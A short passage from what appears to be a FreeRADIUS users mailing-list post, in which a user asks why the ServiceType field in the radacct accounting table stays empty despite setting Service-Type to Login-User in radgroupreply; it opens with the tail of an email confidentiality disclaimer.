addressee). If you are not the intended reciptient of this message, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please destroy the message or delete it from your system immediately and notify the sender.()[EMAIL PROTECTED]() inline: ttn1.jpg
problem with ServiceType in radacct table
Hi, I am having problem with ServiceType field in radacct. I have setup Service-Type Attribute in radgroupreply to 1 i.e. Login-User, but radacct table is not updated accordingly. Infact, the field remains empty. Any ideas. Thanks. Prabh Freeradius Version 1.0. Linux - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html